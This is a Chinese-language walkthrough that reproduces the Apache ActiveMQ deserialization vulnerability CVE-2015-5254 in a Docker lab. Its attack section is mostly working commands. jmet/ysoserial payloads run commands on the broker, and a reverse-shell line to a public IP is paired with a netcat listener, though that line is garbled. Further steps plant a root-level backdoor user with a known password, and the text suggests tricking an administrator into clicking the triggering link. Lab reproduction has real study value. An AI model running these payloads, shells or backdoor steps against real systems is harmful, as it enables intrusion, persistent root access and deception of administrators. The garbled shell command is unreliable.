標題：ActiveMQ反序列化漏洞（CVE-2015-5254）復現

[taibeihacker]

0x00 漏洞前言​

Apache ActiveMQ是美國阿帕奇（Apache）軟件基金會所研發的一套開源的消息中間件，它支持Java消息服務，集群，Spring Framework等。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞，該漏洞源於程序沒有限制可在代理中序列化的類。遠程攻擊者可藉助特製的序列化的Java消息服務（JMS）ObjectMessage對象利用該漏洞執行任意代碼。

0x01 漏洞环境​

1.在ubuntu16.04下安裝docker/docker-compose:
# 安裝pip
curl -s https://bootstrap.pypa.io/get-pip.py | python3
# 安裝最新版docker
curl -s https://get.docker.com/| sh
# 啟動docker服務
service docker start
# 安裝compose
pip install docker-compose
# 下載項目
wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
unzip vulhub-master.zip
cd vulhub-master
# 進入某一個漏洞/環境的目錄
cd activemq/CVE-2015-5254/
# 自動化編譯環境
docker-compose build

2.運行漏洞環境：
docker-compose up -d
環境運行後，將監聽61616和8161兩個端口其中61616是工作端口，消息在這個端口進行傳遞; 8161是網絡管理頁面端口訪問http://your-ip:8161即可看到網絡管理頁面，不過這個漏洞理論上是不需要網絡的。
使用瀏覽器直接訪問activemq，查看是否部署完畢

http://45.32.101.90:8161/admin/（默認的用戶名/密碼為admin/admin）

0x02 漏洞复现​

1.漏洞利用過程如下：
a.構造（可以使用ysoserial）可執行命令的序列化對象
b.作為一個消息，發送給目標61616端口
c.訪問的Web管理頁面，讀取消息，觸發漏洞
2.使用jmet進行漏洞利用:
首先下載jmet的jar文件，並在同目錄下創建一個external文件夾（否則可能會爆文件夾不存在的錯誤）。 jmet原理是使用ysoserial生成Payload並發送（其jar內自帶ysoserial，無需再自己下載），所以我們需要在ysoserial是gadget中選擇一個可以使用的，比如ROME。
cd /opt
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
mkdir external
3.執行命令
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y 'touch /tmp/sucess' -Yp ROME 45.32.101.90 61616

4.此時會給目標的ActiveMQ添加一個名為事件的隊列，可以我們通過http://45.32.101.90:8161/admin/browse.jsp?JMSDestination=event看到這個隊列中所有消息：

5.點擊查看這條消息即可觸發命令執行

6.此時進入容器
docker exec -it cc0e9385f975 /bin/bash

7.可看到/tmp /已成功創建，說明漏洞利用成功：

8.反彈shell:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y 'bash -i /dev/tcp/45.32.101.90/123401' -Yp ROME45.32.101.90 61616

遠程主機監聽1234端口：
nc -lvvp 1234
即可看到反彈是shell:

值得注意的是，通過網絡管理頁面訪問消息並觸發漏洞這個過程需要管理員權限。在沒有密碼的情況下，我們可以誘導管理員訪問我們的鏈接以觸發，或者偽裝成其他合法服務需要的消息，等待客戶端訪問的時候觸發。
9.添加用戶
執行jmet的命令添加test用戶並將其添加到root組,返回http://192.168.221.185:8161/admin/browse.jsp?JMSDestination=event頁面，點擊一下消息，觸發它：
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y 'useradd -g root -s /bin/bash -u 10010 test' -Yp ROME 45.32.101.90 61616
讓我們再將passwd中的test的uid修改為0，使它擁有root權限,返回http://192.168.221.185:8161/admin/browse.jsp?JMSDestination=event頁面，點擊一下消息，觸發它。
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y 'sed -i 's/test:x:10010/test:x:0/g' /etc/passwd' -Yp ROME 45.32.101.90 61616
讓我們再為test用戶設置一個密碼,返回http://192.168.221.185:8161/admin/browse.jsp?JMSDestination=event頁面，點擊一下消息，觸發它。
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y 'echo 'test:sd123456' | chpasswd' -Yp ROME 45.32.101.90 61616
到此為止，一個權限為root，密碼為123456的用戶即創建完畢。我們可以使用ssh直接遠程登陸進入操作系統，並且還是最高權限。

0x03 参考链接​

https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf